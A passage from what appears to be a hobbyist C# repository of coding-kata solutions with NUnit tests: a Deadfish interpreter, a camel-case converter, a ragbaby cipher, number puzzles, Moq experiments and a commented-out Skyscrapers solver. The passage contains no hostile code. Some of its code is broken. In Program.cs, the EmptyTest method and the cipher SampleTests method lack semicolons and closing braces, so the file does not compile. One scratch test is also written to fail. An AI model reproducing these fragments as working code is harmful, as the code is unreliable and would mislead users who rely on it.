        // at runtime; the parameters i and j are currently unused.
        public virtual int MyFunc(int i, int j)
        {
            Console.Out.Write("In class BaseClass1");
            return 1;
        }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Deadfish.cs
using System.Collections.Generic;
using NUnit.Framework;
/// <summary>
/// Interpreter for the Deadfish esolang: 'i' increments, 'd' decrements,
/// 's' squares, 'o' outputs the current value; any other character is a
/// no-op. Returns every output in order.
/// </summary>
public class Deadfish
{
    public static int[] Parse(string data)
    {
        List<int> output = new List<int>();
        int value = 0;
        foreach (char command in data)
        {
            switch (command)
            {
                case 'i':
                    value++;
                    break;
                case 'd':
                    value--;
                    break;
                case 's':
                    value *= value;
                    break;
                case 'o':
                    output.Add(value);
                    break;
            }
        }
        return output.ToArray();
    }
}
namespace Solution {
using NUnit.Framework;
using System;
    // NUnit fixture for Deadfish.Parse, driven by parameterized sample cases
    // (program source paired with the expected output sequence).
    [TestFixture]
    public class SolutionTest
    {
        private static object[] sampleTestCases = new object[]
        {
            new object[] {"iiisdoso", new int[] {8, 64}},
            new object[] {"iiisdosodddddiso", new int[] {8, 64, 3600}},
        };
        [Test, TestCaseSource("sampleTestCases")]
        public void SampleTest(string data, int[] expected)
        {
            Assert.AreEqual(expected, Deadfish.Parse(data));
        }
    }
}<file_sep>/ConsoleApplication1/ConsoleApplication1/CamelCaseToUnderscore.cs
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
public static class CamelCaseTranslator
{
public static string ToUnderScore(string name)
{
if (string.IsNullOrEmpty(name)) return name;
return name.Substring(1).Aggregate(name[0].ToString(),
(a, b) => a + ((char.IsUpper(b) || char.IsNumber(b) && !char.IsNumber(a.LastOrDefault())) && a.LastOrDefault() != '_' ? "_" : "") + b);
}
}
    // NUnit tests for CamelCaseTranslator.ToUnderScore: plain words, digit
    // groups, and inputs that already contain underscores.
    [TestFixture]
    public class CamelCaseTranslatorTests
    {
        [Test]
        public void SimpleUnitNameTests()
        {
            Assert.AreEqual("This_Is_A_Unit_Test", CamelCaseTranslator.ToUnderScore("ThisIsAUnitTest"));
            Assert.AreEqual("This_Should_Be_Splitted_Correct_Into_Underscore", CamelCaseTranslator.ToUnderScore("ThisShouldBeSplittedCorrectIntoUnderscore"));
        }
        [Test]
        public void CalculationUnitNameTests()
        {
            // Multi-digit numbers stay together as a single group.
            Assert.AreEqual("Calculate_1_Plus_1_Equals_2", CamelCaseTranslator.ToUnderScore("Calculate1Plus1Equals2"));
            Assert.AreEqual("Calculate_15_Plus_5_Equals_20", CamelCaseTranslator.ToUnderScore("Calculate15Plus5Equals20"));
            Assert.AreEqual("Calculate_500_Divided_By_5_Equals_100", CamelCaseTranslator.ToUnderScore("Calculate500DividedBy5Equals100"));
        }
        [Test]
        public void SpecialUnitNameTests()
        {
            // Existing underscores must not be doubled.
            Assert.AreEqual("This_Is_Already_Splitted_Correct", CamelCaseTranslator.ToUnderScore("This_Is_Already_Splitted_Correct"));
            Assert.AreEqual("This_Is_Not_Splitted_Correct", CamelCaseTranslator.ToUnderScore("ThisIs_Not_SplittedCorrect"));
        }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/GoingToZeroOrToInfinity.cs
using System;
using System.Linq;
using ConsoleApplication1;
using NUnit.Framework;
namespace ConsoleApplication1
{
class GoingToZeroOrToInfinity
{
public static double going(int n)
{
Console.WriteLine(n);
double factorialSum = 0;
for (int i = 1; i <= n; i++)
{
factorialSum += 1 / FI_DEV_FN(i,n);
}
return Math.Round(factorialSum, 6);
}
private static double FI_DEV_FN(int n, int d)
{
double retVal = 1;
for(int i = n + 1; i<=d; i++)
retVal *= i;
return retVal;
}
}
}
// NUnit tests for GoingToZeroOrToInfinity.going against known rounded values.
[TestFixture]
public class SuiteTests
{
    [Test]
    public void Test01()
    {
        Assert.AreEqual(1.275, GoingToZeroOrToInfinity.going(5));
    }
    [Test]
    public void Test02()
    {
        Assert.AreEqual(1.2125, GoingToZeroOrToInfinity.going(6));
    }
    [Test]
    public void Test03()
    {
        Assert.AreEqual(1.173214, GoingToZeroOrToInfinity.going(7));
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/MultiplesOf3Or5.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using NUnit.Framework;
namespace ConsoleApplication1
{
class MultiplesOf3Or5
{
public static int Solution(int value)
{
int sum = 0;
int factor = 1;
while(3 * factor < value)
{
sum += 3 * factor;
factor++;
}
factor = 1;
while (5 * factor < value)
{
sum += 5 * factor;
factor++;
}
factor = 1;
while (15 * factor < value)
{
sum -= 15 * factor;
factor++;
}
return sum;
}
[Test]
public void Test()
{
Assert.AreEqual(23, Solution(10));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/FormatWordsIntoASentence.cs
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
class FormatWordsIntoASentence
{
public static string FormatWords(string[] words)
{
if(words == null) return string.Empty;
List<string> filterEmpty = words.Where(x => !string.IsNullOrWhiteSpace(x)).ToList();
List<string> exceptLast = new List<string>(filterEmpty);
if(exceptLast.Count > 1) exceptLast.RemoveAt(exceptLast.Count-1);
string retVal = exceptLast.Any() ? exceptLast.Aggregate((a, b) => a + ", " + b) : string.Empty;
if (filterEmpty.Count > 1)
return retVal + " and " + filterEmpty.Last();
return retVal;
}
}
    [TestFixture]
    public class Sample_Tests
    {
        // Each TestCaseData pairs an input word array with the expected sentence.
        private static IEnumerable<TestCaseData> testCases
        {
            get
            {
                yield return new TestCaseData(new[] { new string[] { "one", "two", "three", "four" } })
                    .Returns("one, two, three and four")
                    .SetDescription("{\"one\", \"two\", \"three\", \"four\"} should return \"one, two, three and four\"");
                yield return new TestCaseData(new[] { new string[] { "one" } })
                    .Returns("one")
                    .SetDescription("{\"one\"} should return \"one\"");
                yield return new TestCaseData(new[] { new string[] { "one", "", "three" } })
                    .Returns("one and three")
                    .SetDescription("{\"one\", \"\", \"three\"} should return \"one and three\"");
                yield return new TestCaseData(new[] { new string[] { "", "", "three" } })
                    .Returns("three")
                    .SetDescription("{\"\", \"\", \"three\"} should return \"three\"");
                yield return new TestCaseData(new[] { new string[] { "one", "two", "" } })
                    .Returns("one and two")
                    .SetDescription("{\"one\", \"two\", \"\"} should return \"one and two\"");
                yield return new TestCaseData(new[] { new string[] { } })
                    .Returns("")
                    .SetDescription("{} should return \"\"");
                yield return new TestCaseData(null)
                    .Returns("")
                    .SetDescription("null should return \"\"");
                yield return new TestCaseData(new[] { new string[] { "" } })
                    .Returns("")
                    .SetDescription("{\"\"} should return \"\"");
            }
        }
        [Test, TestCaseSource("testCases")]
        public string Test(string[] words) => FormatWordsIntoASentence.FormatWords(words);
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/IsInteresting.cs
using System;
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
    partial class Kata
    {
        /// <summary>
        /// Returns 2 if <paramref name="number"/> is already "interesting",
        /// 1 if it becomes interesting within the next two increments,
        /// and 0 otherwise.
        /// </summary>
        public static int IsInteresting(int number, List<int> awesomePhrases)
        {
            if (IsInterestingNumer(number, awesomePhrases)) return 2;
            if (IsInterestingNumer(number+1, awesomePhrases)) return 1;
            if (IsInterestingNumer(number+2, awesomePhrases)) return 1;
            return 0;
        }
        // A number is interesting when it has at least 3 digits and is:
        // a digit followed by zeros, a repdigit, an incrementing or decrementing
        // digit run, a palindrome, or one of the caller-supplied awesome phrases.
        private static bool IsInterestingNumer(int number, List<int> awesomePhrases)
        {
            if (number < 100) return false;
            var digits = GetDigits(number);
            List<int> interestingNumbers = new List<int>();
            // First digit followed by zeros, e.g. 7000.
            interestingNumbers.Add((int) (digits.First() * Math.Pow(10, digits.Count - 1)));
            // The aggregate lambdas below ignore b and extend the running value
            // from its own last digit, so each candidate is fully determined by
            // the first digit and the length; comparing against `number`
            // then checks the repdigit / run property.
            interestingNumbers.Add(digits.Aggregate((a, b) => a * 10 + a % 10)); //11111
            if (digits.Count <= 10 - digits.First() + 1)
                interestingNumbers.Add(digits.Aggregate((a, b) => a * 10 + (a % 10 + 1) % 10)); //1234
            if (digits.Count <= digits.First() + 1)
                interestingNumbers.Add(digits.Aggregate((a, b) => a * 10 + a % 10 - 1)); //43210
            if (interestingNumbers.Contains(number)) return true;
            if (IsPalindrome(digits)) return true;
            if (awesomePhrases.Contains(number)) return true;
            return false;
        }
        // Most-significant-first decimal digits of number (assumes number > 0).
        private static List<int> GetDigits(int number)
        {
            List<int> digits = new List<int>();
            while (number > 0)
            {
                digits.Add(number % 10);
                number = number / 10;
            }
            digits.Reverse();
            return digits;
        }
        // True when the digit sequence reads the same forwards and backwards.
        private static bool IsPalindrome(List<int> digits)
        {
            int count = digits.Count;
            int middleCount = count/2;
            for (int i = 0; i < middleCount; i++)
            {
                if (digits[i] != digits[count - 1 - i]) return false;
            }
            return true;
        }
    }
    [TestFixture]
    public class Test
    {
        // Covers all three return values of Kata.IsInteresting (0, 1 and 2).
        [Test]
        public void ShouldWorkTest()
        {
            Assert.AreEqual(1, Kata.IsInteresting(98, new List<int>() { 1337, 256 }));
            Assert.AreEqual(2, Kata.IsInteresting(3210, new List<int>() { 1337, 256 }));
            Assert.AreEqual(2, Kata.IsInteresting(67890, new List<int>() { 1337, 256 }));
            Assert.AreEqual(2, Kata.IsInteresting(9999999, new List<int>() { 1337, 256 }));
            Assert.AreEqual(0, Kata.IsInteresting(3, new List<int>() { 1337, 256 }));
            Assert.AreEqual(1, Kata.IsInteresting(1336, new List<int>() { 1337, 256 }));
            Assert.AreEqual(2, Kata.IsInteresting(1337, new List<int>() { 1337, 256 }));
            Assert.AreEqual(2, Kata.IsInteresting(2000, new List<int>() { 1337, 256 }));
            Assert.AreEqual(2, Kata.IsInteresting(1234, new List<int>() { 1337, 256 }));
            Assert.AreEqual(2, Kata.IsInteresting(12321, new List<int>() { 1337, 256 }));
            Assert.AreEqual(0, Kata.IsInteresting(11208, new List<int>() { 1337, 256 }));
            Assert.AreEqual(1, Kata.IsInteresting(11209, new List<int>() { 1337, 256 }));
            Assert.AreEqual(2, Kata.IsInteresting(11211, new List<int>() { 1337, 256 }));
        }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Test1.cs
using System;
using System.Collections;
using System.Collections.Generic;
using Castle.Core.Internal;
using NUnit.Framework;
namespace MySpace123
{
    [TestFixture]
    public class MyTest123
    {
        // Scratch tests exploring language behavior; not production assertions.
        [Test]
        public void Test11()
        {
            // With yieldReturn == false the iterator yields nothing, so the
            // loop body never runs.
            foreach (var myString in GetMyStrings(false)) Console.WriteLine(myString);
        }
        // Lazily yields a single string only when yieldReturn is true.
        private IEnumerable<string> GetMyStrings(bool yieldReturn)
        {
            if (yieldReturn)
                yield return "MyString";
        }
        [Test]
        public void Test22()
        {
            // NOTE(review): obj2 aliases obj1 (MyClass is a reference type), so
            // obj1.i is 7 at the assertion and this test fails - presumably an
            // intentional experiment; confirm before relying on it.
            MyClass obj1 = new MyClass(5);
            MyClass obj2 = obj1;
            obj2.i = 7;
            Assert.AreEqual(5, obj1.i);
        }
        [Test]
        public void Test33()
        {
            // Deliberately fails so the computed value shows up in test output.
            Assert.Fail(GetBinary(4).ToString());
        }
        // Parses the fixed bit pattern "1010" as base 2; the value parameter is
        // currently unused (see the commented-out line).
        private static int GetBinary(int value)
        {
            char[] binaryString = new[] {'1', '0', '1', '0'};
            //binaryString[4 - value] = '1';
            return Convert.ToInt32(string.Concat(binaryString), 2);
        }
    }
    // Minimal mutable reference type used by the reference-aliasing experiment
    // in this file.
    class MyClass
    {
        public int i;
        public MyClass(int i)
        {
            this.i = i;
        }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Program.cs
using System.Collections.Generic;
using NUnit.Framework;
using System;
using Moq;
namespace ConsoleApplication1
{
public partial class Kata
{
        // Console entry point; intentionally empty - this project is driven by
        // its NUnit tests, not by running the executable.
        static void Main(string[] args)
        {
        }
        // Helper fed to the Moq Setup in TestTest; always returns 1 and logs
        // that it ran.
        int MockMyFunc(int i , int j)
        {
            Console.Out.Write("In MockClass");
            return 1;
        }
        [Test]
        public void TestTest()
        {
            // Moq scratch test. Note the Returns(...) argument is evaluated
            // eagerly here (MockMyFunc runs immediately), not when MyFunc is
            // later invoked on the mock.
            //BaseClass1 baseObj = new Derived11();
            //baseObj.MyFunc();
            Mock<BaseClass1> mockObj = new Mock<BaseClass1>();
            mockObj.Setup(x => x.MyFunc(1, 4)).Returns(MockMyFunc(43, 54));
        }
        [Test]
        public void EmptyTest()
        {
            // An empty sequence collapses to an empty sequence.
            Assert.AreEqual("", UniqueInOrder(""))
        [Test]
        public void Test1()
        {
            // Consecutive duplicate characters collapse to one occurrence each.
            Assert.AreEqual("ABCDAB", UniqueInOrder("AAAABBBCCDAABBB"));
        }
public static IEnumerable<T> UniqueInOrder<T>(IEnumerable<T> iterable)
{
T lastItem = default(T);
foreach (T x1 in iterable)
{
if (!x1.Equals(lastItem))
{
lastItem = x1;
yield return x1;
}
}
}
        [Test]
        public void BasicTests()
        {
            // 50 kg of iron per robot, grossed up for the scrap percentage lost
            // at each production step, rounded up to a whole kilogram.
            Assert.AreEqual(5000, CalculateScrap(new[] { 10 }, 90));
            Assert.AreEqual(3820, CalculateScrap(new[] { 20, 10 }, 55));
        }
public long CalculateScrap(int[] scraps, int numberOfRobots)
{
double ironNeededForLastStep = 50 * numberOfRobots;
foreach (int scrap in scraps)
{
ironNeededForLastStep = 100.0 * ironNeededForLastStep / (100 - scrap);
}
double roundedNumber = (long) ironNeededForLastStep;
if (ironNeededForLastStep > roundedNumber)
return (long)roundedNumber + 1;
return (long) ironNeededForLastStep + 1;
}
//****************
//Ragbaby cipher
//*****************
public static string Encode(string text, string key)
{
return Encode_Decode(text, key, IndexOfC_Encoding);
}
public static string Decode(string text, string key)
{
return Encode_Decode(text, key, IndexOfC_Decoding);
}
        // Shared encode/decode walk: each letter is shifted within the keyed
        // alphabet by its 1-based position in the current word (indexOfC picks
        // the direction); case is preserved and non-letters pass through.
        private static string Encode_Decode(string text, string key, Func<List<char>, char, int, int> indexOfC)
        {
            List<char> alphabets = KeyedAlphabets(key);
            List<char> endocedString = new List<char>();
            int j = 0;
            foreach (char c in text)
            {
                j++;
                char lowerC = c;
                bool isUpper = false;
                if (char.IsUpper(c))
                {
                    lowerC = char.ToLower(c);
                    isUpper = true;
                }
                if (lowerC >= 'a' && lowerC <= 'z')
                {
                    char encodedChar = alphabets[indexOfC(alphabets, lowerC, j)];
                    if (isUpper) encodedChar = char.ToUpper(encodedChar);
                    endocedString.Add(encodedChar);
                }
                else
                {
                    // Word boundary: emit the character unchanged and restart
                    // the per-word shift counter.
                    endocedString.Add(c);
                    j = 0;
                }
            }
            return new string(endocedString.ToArray());
        }
private static int IndexOfC_Encoding(List<char> alphabets, char lowerC, int j)
{
int indexOfC = alphabets.IndexOf(lowerC) + j;
if (indexOfC >= 26) indexOfC = indexOfC - 26;
return indexOfC;
}
private static int IndexOfC_Decoding(List<char> alphabets, char lowerC, int j)
{
int indexOfC = alphabets.IndexOf(lowerC) - j;
if (indexOfC < 0) indexOfC = 26 + indexOfC;
return indexOfC;
}
private static List<char> KeyedAlphabets(string key)
{
HashSet<char> keyHash = new HashSet<char>();
List<char> alphabets = new List<char>();
foreach (char c in key)
{
if (keyHash.Add(c)) alphabets.Add(c);
}
for (char c = 'a'; c <= 'z'; c++)
{
if (!keyHash.Contains(c)) alphabets.Add(c);
}
return alphabets;
}
// List<char> alphabets = KeyedAlphabets(key);
// List<char> decodedString = new List<char>();
// int j = 0;
// foreach (char c in text)
// {
// j++;
// char lowerC = c;
// bool isUpper = false;
// if (char.IsUpper(c))
// {
// lowerC = char.ToLower(c);
// isUpper = true;
// }
// if (lowerC >= 'a' && lowerC <= 'z')
// {
// char encodedChar = alphabets[IndexOfC_Decoding(alphabets, lowerC, j)];
// if (isUpper) encodedChar = char.ToUpper(encodedChar);
// decodedString.Add(encodedChar);
// }
// else
// {
// decodedString.Add(c);
// j = 0;
// }
// }
// return new string(decodedString.ToArray());
//}
}
    [TestFixture]
    public class SolutionTest
    {
        [Test]
        public void SampleTests()
        {
            // Fixed-vector and round-trip checks for the ragbaby cipher.
            Assert.AreEqual("ihrbfj", Kata.Encode("cipher", "cipher"));
            Assert.AreEqual("ihrbfj", Kata.Encode("cipher", "cccciiiiippphheeeeerrrrr"));
            Assert.AreEqual("Urew pu bq rzfsbtj.", Kata.Encode("This is an example.", "cipher"));
            Assert.AreEqual("Urew.uRew.urEw.ureW...", Kata.Encode("This.tHis.thIs.thiS...", "cipher"));
            Assert.AreEqual("cipher", Kata.Decode("ihrbfj", "cipher"));
            Assert.AreEqual("This is an example.", Kata.Decode("Urew pu bq rzfsbtj.", "cipher"));
            Assert.AreEqual("This.tHis.thIs.thiS...", Kata.Decode("Urew.uRew.urEw.ureW...", "cipher"));
            Assert.AreEqual("This is an example.", Kata.Encode(Kata.Decode("This is an example.", "cipher"), "cipher"))
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Derived11.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace ConsoleApplication1
{
    // Intentionally empty subclass: inherits BaseClass1's behavior unchanged.
    // The commented-out 'new' method was an experiment with member hiding.
    class Derived11 : BaseClass1
    {
        //public new void MyFunc()
        //{ Console.Out.Write("In class Derived11"); }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Skyscrapers - Copy.cs
//using System;
//using System.Collections.Generic;
//using System.Diagnostics;
//using System.Linq;
//using NUnit.Framework;
//namespace ConsoleApplication1
//{
// //without print statements
// class Skyscrapers
// {
// public const int Size = 4;
// public static Cell[][] AllCells;
// internal class Cell
// {
// public int X;
// public int Y;
// public readonly List<int> PossibleValues = new List<int>(Enumerable.Range(1,Size));
// private int _valueSet;
// public Cell(int x, int y)
// {
// X = x;
// Y = y;
// }
// public void RemoveValue(int value)
// {
// if(!PossibleValues.Remove(value)) return;
// if (PossibleValues.Count == 1)
// {
// SetCellValue(PossibleValues.First());
// }
// EliminateValuesSingle(value);
// }
// private void EliminateValuesSingle(int value)
// {
// //Iterate over column and find if this value is present only in one cell then set value for that cell.
// Cell uniqueCell = null;
// for (int x = 0, y= Y; x < Size; x++)
// {
// Cell currCell = AllCells[x][y];
// if (currCell.PossibleValues.Contains(value))
// {
// if (uniqueCell != null)
// {
// uniqueCell = null;
// break;
// }
// uniqueCell = currCell;
// }
// }
// uniqueCell?.SetCellValue(value);
// //Iterate over rows
// uniqueCell = null;
// for (int x = X, y= 0; y < Size; y++)
// {
// Cell currCell = AllCells[x][y];
// if (currCell.PossibleValues.Contains(value))
// {
// if (uniqueCell != null)
// {
// uniqueCell = null;
// break;
// }
// uniqueCell = currCell;
// }
// }
// uniqueCell?.SetCellValue(value);
// }
// public void SetCellValue(int value)
// {
// if(_valueSet != 0) return;
// _valueSet = value;
// for (var i = 0; i < 4; i++)
// {
// if (i == value - 1) continue;
// RemoveValue(i+1);
// }
// foreach (int laneIndex in GetLanesContainingCell(this))
// {
// Lane lane = _allLanes[laneIndex];
// if(lane.Clue == 0) continue;
// if(this != lane.Cells.Last()) continue;
// int oldSize = lane.Cells.Count;
// int newSize = oldSize;
// for (; newSize > 0; newSize--)
// {
// if (lane.Cells[newSize-1]._valueSet == 0) break;
// }
// if(!lane.Cells.Where((c, i) => i > newSize-1 && c._valueSet == oldSize).Any()) return;
// int numberOfVisible = 1;
// int highestBuildingSize = lane.Cells[newSize]._valueSet;
// for (int j = newSize+1; j < oldSize; j++)
// {
// int currBuildingSize = lane.Cells[j]._valueSet;
// if (currBuildingSize > highestBuildingSize)
// {
// numberOfVisible++;
// highestBuildingSize = currBuildingSize;
// }
// }
// lane.Clue = lane.Clue > numberOfVisible ? lane.Clue - numberOfVisible : 0;
// lane.Cells.RemoveRange(newSize, oldSize-newSize);
// }
// for (int i = 0; i < 4; i++)
// {
// if (i == Y) continue;
// GetCell(X, i).RemoveValue(value);
// }
// for (int i = 0; i < 4; i++)
// {
// if (i == X) continue;
// GetCell(i, Y).RemoveValue(value);
// }
// }
// }
// private class Lane
// {
// public int Clue;
// public readonly List<Cell> Cells;
// public Lane(int clue, int index)
// {
// Clue = clue;
// Cells = GetLaneCells(index);
// }
// private static List<Cell> GetLaneCells(int index)
// {
// List<Cell> laneCells = new List<Cell>(Size);
// if (index < Size)
// {
// for (var i = 0; i < Size; i++)
// {
// laneCells.Add( GetCell(i, index ) );
// }
// }
// else if (index < 2 * Size)
// {
// for (var i = 0; i < Size; i++)
// {
// laneCells.Add( GetCell( index - Size, Size - i - 1 ) );
// }
// }
// else if (index < 3 * Size)
// {
// for (var i = 0; i < Size; i++)
// {
// laneCells.Add( GetCell( Size - i - 1, 3 * Size - index - 1 ) );
// }
// }
// else
// {
// for (var i = 0; i < Size; i++)
// {
// laneCells.Add( GetCell( 4 * Size - index - 1, i ) );
// }
// }
// return laneCells;
// }
// }
// private static Lane[] _allLanes;
// public static int[][] SolvePuzzle(int[] clues)
// {
// AllCells = new Cell[Size][];
// for (var i = 0; i < Size; i++)
// {
// AllCells[i] = new Cell[Size];
// for (var j = 0; j < Size; j++)
// {
// AllCells[i][j] = new Cell(i,j);
// }
// }
// _allLanes = new Lane[4*Size];
// for (var i = 0; i < clues.Length; i++)
// {
// _allLanes[i] = new Lane(clues[i], i);
// }
// for (int i = 0; i < 10; i++)
// {
// //Process clues
// foreach (Lane lane in _allLanes)
// {
// ProcessClues(lane);
// }
// if(AllCells.Count(r => r.Count(c => c.PossibleValues.Count != 1) != 0) == 0) break;
// }
// int [][] grid = new int[4][];
// for (var rowIndex = 0; rowIndex < 4; rowIndex++)
// {
// grid[rowIndex] = new int[4];
// for (var colIndex = 0; colIndex < 4; colIndex++)
// {
// grid[rowIndex][colIndex] = AllCells[rowIndex][colIndex].PossibleValues.Aggregate((a, b) => a + b);
// }
// }
// return grid;
// }
// private static bool ProcessClues(Lane lane)
// {
// int clue = lane.Clue;
// int size = lane.Cells.Count;
// if (clue == 0) return false;
// if (clue == 1)
// {
// lane.Cells[0].SetCellValue(lane.Cells[0].PossibleValues.Max());
// }
// else if (clue == size)
// {
// for (int i = 0; i < size; i++)
// {
// lane.Cells.ElementAtOrDefault(i)?.SetCellValue(i+1);
// }
// }
// else
// {
// if (clue == 2 && size > 1)
// {
// lane.Cells[1].RemoveValue(size-1);
// }
// for (int value = size; value > size - clue + 1; value--)
// {
// for (int i = 0; i < clue + value - size - 1; i++)
// {
// lane.Cells.ElementAtOrDefault(i)?.RemoveValue(value);
// }
// }
// }
// return true;
// }
// private static int[] GetLanesContainingCell(Cell cell)
// {
// return new [] {cell.Y, cell.X + Size, 3*Size - cell.Y -1, 4*Size - cell.X - 1};
// }
// private static Cell GetCell(int x, int y)
// {
// return AllCells[x][y];
// }
// }
// [TestFixture]
// public class SkyscrapersTests
// {
// private const int Size = Skyscrapers.Size;
// [Test]
// public void SolveSkyscrapers1()
// {
// var clues = new[]{
// 2, 2, 1, 3,
// 2, 2, 3, 1,
// 1, 2, 2, 3,
// 3, 2, 1, 3};
// var expected = new []{ new []{1, 3, 4, 2},
// new []{4, 2, 1, 3},
// new []{3, 4, 2, 1},
// new []{2, 1, 3, 4 }};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers2()
// {
// var clues = new[]{
// 0, 0, 1, 2,
// 0, 2, 0, 0,
// 0, 3, 0, 0,
// 0, 1, 0, 0};
// var expected = new []{ new []{2, 1, 4, 3},
// new []{3, 4, 1, 2},
// new []{4, 2, 3, 1},
// new []{1, 3, 2, 4}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers3()
// {
// var clues = new[]{
// 1, 2, 4, 2,
// 2, 1, 3, 2,
// 3, 1, 2, 3,
// 3, 2, 2, 1};
// var expected = new []{
// new []{ 4, 2, 1, 3},
// new []{ 3, 1, 2, 4},
// new []{ 1, 4, 3, 2},
// new []{ 2, 3, 4, 1}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers4()
// {
// var clues = new[]{
// 2, 2, 1, 3,
// 2, 2, 3, 1,
// 1, 2, 2, 3,
// 3, 2, 1, 3};
// var expected = new []{
// new []{ 1, 3, 4, 2},
// new []{ 4, 2, 1, 3},
// new []{ 3, 4, 2, 1},
// new []{ 2, 1, 3, 4}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers5()
// {
// var clues = new[]{
// 0, 2, 0, 0,
// 0, 3, 0, 0,
// 0, 1, 0, 0,
// 0, 0, 1, 2};
// var expected = new []{
// new []{ 3, 2, 1, 4},
// new []{ 4, 1, 3, 2},
// new []{ 1, 4, 2, 3},
// new []{ 2, 3, 4, 1}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers6()
// {
// var clues = new[]{
// 2, 2, 3, 1,
// 1, 2, 2, 3,
// 3, 2, 1, 3,
// 2, 2, 1, 3};
// var expected = new []{
// new []{ 2, 3, 1, 4},
// new []{ 4, 1, 2, 3},
// new []{ 3, 2, 4, 1},
// new []{ 1, 4, 3, 2}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// private static string ErrorMessage(int[][] expected, int [][] actual, Stack<int> orderedClues)
// {
// return Environment.NewLine
// + string.Join(Environment.NewLine, expected.Select(r => string.Join("|", r)))
// + Environment.NewLine + Environment.NewLine
// + " "+ string.Join(" " , Enumerable.Range(0,4).Select(i=> orderedClues.Pop())) + Environment.NewLine
// + string.Join(Environment.NewLine, Skyscrapers.AllCells.Select(r => orderedClues.Pop() + " |" + string.Join("|", r.Select(c => c.PossibleValues.Count==1 ? c.PossibleValues.FirstOrDefault(v=>v!=0).ToString() : " ")) + "| " + orderedClues.Pop())) + Environment.NewLine
// + " " + string.Join(" ", Enumerable.Range(0, 4).Select(i => orderedClues.Pop())) + Environment.NewLine
// + Environment.NewLine + Skyscrapers.PrintValues()
// + Environment.NewLine + "Difference index: " + DifferenceIndex(expected, actual)
// + Environment.NewLine ;
// }
// private static string DifferenceIndex(int[][] expected, int[][] actual)
// {
// for (int i = 0; i < Skyscrapers.Size; i++)
// {
// for (int j = 0; j < Size; j++)
// {
// if (expected[i][j] != actual[i][j]) return i + "," + j;
// }
// }
// return string.Empty;
// }
// }
//}
<file_sep>/ConsoleApplication1/ConsoleApplication1/DatasetTrials.cs
using System;
using System.Data;
using System.Globalization;
using System.IO;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
    // Scratch experiments with DataSet XML round-tripping and culture settings.
    public static class DatasetTrials
    {
        // Writes a small single-table DataSet (de-DE locale) to disk with its
        // schema, prints the XML and schema, then reads the file back and
        // prints the result for comparison.
        // NOTE(review): hard-codes the Windows path d:\temp and leaves the
        // file behind - fine for a scratch experiment, not for a real test.
        public static void WriteToDataset()
        {
            Console.WriteLine(CultureInfo.CurrentCulture);
            Console.WriteLine();
            Console.WriteLine();
            DataSet dataSet = new DataSet();
            dataSet.Locale = new CultureInfo("de-DE");
